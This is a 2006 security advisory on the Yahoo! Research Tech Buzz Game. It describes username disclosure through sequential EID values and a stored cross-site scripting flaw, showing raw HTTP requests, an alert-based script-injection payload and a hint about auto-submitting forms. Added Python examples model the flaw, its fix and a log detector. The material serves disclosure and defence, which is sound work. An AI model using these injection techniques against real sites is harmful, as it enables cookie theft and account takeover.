zbeng

Yahoo! Research Multiple vulnerabilities


Authors: Simo64 and Simo Ben youssef

Contacts : <simo64_at_morx_org> / <simo_at_morx_org>

Discovered: 02 August 2006

Published: 17 August 2006

MorX Security Research Team

Original Advisory:

http://www.morx.org/YahooResearchMultiple.txt

http://www.morx.org

Service/Product: The Tech Buzz Game

Vendors: Yahoo! Research and O'Reilly Media

Vulnerability: Cross Site Scripting / Users Information Disclosure

Severity: Low/Medium

Tested on: Microsoft IE 6.0, Firefox 1.5 and Opera (should work on all browsers)

Description:

The Tech Buzz Game is a fledgling research project and demo rather than a full-fledged Yahoo! product; it is a product of Yahoo! Research and O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz scores are powered by Yahoo! Search technology and Yahoo! Search Web Services. The buzz scoring methodology was originally developed for the Yahoo! Buzz Index, which tracks web search spikes and trends.

For more details, visit:

http://buzz.research.yahoo.com/dm/info/about.html

Details:

1- Username disclosure

The login2.html script is written in a way that stores user error information in login.html. If a user fails to sign in to the game, the error returned by login2.html, together with the submitted username, is stored in login.html. login.html assigns each such request a numerical EID value, and the stored information is accessible to anyone over HTTP who supplies that EID.

From the login.html source code:

<td valign="top" align="center" >

      <form action=hlogin2.html method=post>

      <input type=hidden name=cmd value=Domain.login>

      <input type=hidden name=error.page value=login.html> <--- stores the information back in login.html

Example:

C:>nc buzz.research.yahoo.com 80

GET /dm/login/login.html?eid=100 HTTP/1.1

Host: 127.0.0.1

Connection: Closed

HTTP/1.1 200 OK

Date: Thu, 17 Aug 2006 14:40:46 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7

Transfer-Encoding: chunked

Content-Type: text/html

1d84

--------------------- Scroll down ------------------------

        <td align="left" scope="col">Username:</td>

        <td align="left" scope="col"><input type="text" name="login" value='wil*******' /></td> <--- a previously stored yahoo ID

       

<td class="error" align="left" scope="col"></td>

PoC:

http://buzz.research.yahoo.com/dm/login/lo...random-numbers
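The disclosure above is a design flaw rather than a parsing bug: the failed-login record is keyed by a small sequential integer and handed back to any client that asks for it. The following Python is an added illustration, not code from the advisory or from Yahoo!'s site. It models the observed behaviour with an assumed `SequentialErrorStore`, shows a session-bound alternative that uses a random single-use token, and adds a small detector that scans constructed Apache-style access log lines for one client walking through many distinct `eid` values (the pattern the PoC relies on). The store classes, the log lines and the threshold are all assumptions for the example.

```python
import itertools
import re
import secrets
from collections import defaultdict


class SequentialErrorStore:
    """Assumed model of the flaw: each failed login is saved under the next
    integer EID and login.html?eid=N returns it to whoever asks."""

    def __init__(self, first_eid=100):
        self._ids = itertools.count(first_eid)
        self._records = {}

    def save(self, username, message):
        eid = next(self._ids)
        self._records[eid] = {"username": username, "message": message}
        return eid

    def load(self, eid, session_id):
        # session_id is ignored: any client that guesses an EID gets the record
        return self._records.get(eid)


class SessionBoundErrorStore:
    """Hardened variant: the record is keyed by a 256-bit random token, is
    returned only to the session that produced it, and is deleted on first read."""

    def __init__(self):
        self._records = {}

    def save(self, username, message, session_id):
        token = secrets.token_urlsafe(32)  # not guessable, not enumerable
        self._records[token] = (session_id, {"username": username, "message": message})
        return token

    def load(self, token, session_id):
        owner, record = self._records.pop(token, (None, None))  # single use
        return record if owner is not None and owner == session_id else None


# Constructed access log lines in Apache common log format (not real traffic):
# one ordinary user fetching its own error page, one client sweeping EIDs.
SAMPLE_ACCESS_LOG = [
    '198.51.100.4 - - [17/Aug/2006:14:39:01 +0000] "POST /dm/login/login2.html HTTP/1.1" 302 288',
    '198.51.100.4 - - [17/Aug/2006:14:39:02 +0000] "GET /dm/login/login.html?eid=182 HTTP/1.1" 200 7576',
] + [
    f'203.0.113.7 - - [17/Aug/2006:14:40:{46 + i:02d} +0000] "GET /dm/login/login.html?eid={100 + i} HTTP/1.1" 200 7556'
    for i in range(8)
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET /dm/login/login\.html\?eid=(?P<eid>\d+) HTTP/1\.[01]" (?P<status>\d{3})'
)


def find_eid_enumeration(log_lines, threshold=5):
    """Return {ip: number of distinct eids} for clients that requested more
    distinct eid values than `threshold`. A legitimate user sees only the
    one or two EIDs that its own failed logins produced."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m:
            seen[m["ip"]].add(int(m["eid"]))
    return {ip: len(eids) for ip, eids in seen.items() if len(eids) > threshold}


if __name__ == "__main__":
    weak = SequentialErrorStore()
    eid = weak.save("alice", "Sorry, login failed.")
    print("world-readable record:", weak.load(eid, session_id="someone-else"))

    strong = SessionBoundErrorStore()
    tok = strong.save("alice", "Sorry, login failed.", session_id="sess-A")
    print("other session sees:", strong.load(tok, session_id="sess-B"))
    print("suspected enumeration:", find_eid_enumeration(SAMPLE_ACCESS_LOG))
```

The detector is deliberately simple (distinct EIDs per client address); in production you would window it by time and feed it from the web server's access log rather than an in-memory list, but the signal is the same one a reviewer would look for after reading the PoC.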

2- Permanent Cross Site Scripting:

login2.html not only stores information and makes it publicly accessible through login.html; it also fails to properly sanitize user-supplied input passed through the "login" variable. After a successful script injection, the input is stored in login.html under a specific EID.

Example:

C:>nc buzz.research.yahoo.com 80

POST /dm/login/login2.html HTTP/1.1

Host: 127.0.0.1

Content-Length: 78

Connection: Closed

cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a

HTTP/1.1 302 Found

Date: Thu, 17 Aug 2006 15:10:47 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a

Location: /dm/login/login.html?eid=182

Transfer-Encoding: chunked

Content-Type: text/html; charset=iso-8859-1

120

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<HTML><HEAD>

<TITLE>302 Found</TITLE>

</HEAD><BODY>

<H1>Found</H1>

The document has moved here.

<HR>

Now let's request login.html?eid=182 to see whether our script was filtered.

C:>nc buzz.research.yahoo.com 80

GET /dm/login/login.html?eid=182 HTTP/1.1

Host: 127.0.0.1

Connection: Closed

HTTP/1.1 200 OK

Date: Thu, 17 Aug 2006 13:14:18 GMT

Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a

Transfer-Encoding: chunked

Content-Type: text/html

1d98

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

--------------------------Scroll Down ------------------------

Sorry, login failed.</td>

          </tr>

      <tr>

        <td scope="col" align="left" colspan="4"></td>

      </tr>

      <tr>

        <td scope="col" align="left"></td>

        <td align="left" scope="col">Username:</td>

        <td align="left" scope="col"><input type="text" name="login" value='''><script>alert("a")</script>' /></td> <--- not filtered

PoC:

http://www.morx.org/yahooXSSinject.html

Note: the form requires the user to click to submit it; an attacker may use a form that auto-submits the JavaScript, for example using the onload attribute.
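The response above shows why the injection works: the submitted login value is dropped into a single-quoted `value='...'` attribute with no encoding, so two quote characters close the attribute, `>` closes the `<input>` tag, and a `<script>` element follows as ordinary markup. The Python below is an added example, not the advisory's or Yahoo!'s code: `render_vulnerable` reproduces the observed concatenation (assumed server logic), `render_hardened` applies HTML attribute escaping via `html.escape(..., quote=True)`, and a small `HTMLParser` subclass shows what a browser-style tokenizer sees in each case, including that the hardened output round-trips the original value back into the field without creating any extra element.

```python
import html
from html.parser import HTMLParser

# The exact string from the advisory's POST body (login=...): it closes the
# single-quoted value attribute, ends the <input> tag and injects a script.
ADVISORY_PAYLOAD = """''><script>alert("a")</script>"""


def render_vulnerable(login: str) -> str:
    """Assumed reconstruction of the flaw: raw concatenation into value='...'."""
    return (
        '<td class="error" align="left" scope="col">Sorry, login failed.</td>\n'
        '<td align="left" scope="col"><input type="text" name="login" '
        "value='" + login + "' /></td>"
    )


def render_hardened(login: str) -> str:
    """Same markup, but the value is escaped for an attribute context:
    quote=True turns both ' and " into character references as well as < > &."""
    safe = html.escape(login, quote=True)
    return (
        '<td class="error" align="left" scope="col">Sorry, login failed.</td>\n'
        '<td align="left" scope="col"><input type="text" name="login" '
        "value='" + safe + "' /></td>"
    )


class TagCollector(HTMLParser):
    """Records every start tag plus the attributes of each <input>, which is
    roughly how a browser tokenizer would interpret the fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser unescapes attribute values, so &lt; comes back as <
            self.inputs.append(dict(attrs))


def browser_view(fragment: str):
    """Return (list of start tags, list of <input> attribute dicts)."""
    p = TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags, p.inputs


def is_injected(fragment: str) -> bool:
    """True when the fragment contains a script element, i.e. the login
    value escaped its attribute and became markup."""
    tags, _ = browser_view(fragment)
    return "script" in tags


if __name__ == "__main__":
    print("vulnerable injected:", is_injected(render_vulnerable(ADVISORY_PAYLOAD)))
    print("hardened injected:  ", is_injected(render_hardened(ADVISORY_PAYLOAD)))
    print("hardened field value:", browser_view(render_hardened(ADVISORY_PAYLOAD))[1][0]["value"])
```

Escaping at output time in the attribute context is the fix; rejecting "dangerous" characters at input time is not, because a username containing an apostrophe is legitimate and because the same value may later be emitted into other contexts (HTML body, JavaScript, URL) that each need their own encoding.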

Impact:

An attacker can exploit the vulnerable script to have arbitrary script code executed in the browser of an authenticated Yahoo user in the context of the vulnerable Yahoo website, resulting in the theft of cookie-based authentication credentials, which gives the attacker full access to the victim's accounts (mailbox, etc.), as well as other types of attacks.

Workaround:

Avoid clicking on links while signed in to Yahoo.

Disclaimer:

This entire document is for educational, testing and demonstration purposes only. Modifying, using and/or publishing this information is entirely at your OWN risk. The information provided in this advisory is to be used/tested on your OWN machine/account. I cannot be held responsible for any of the above.
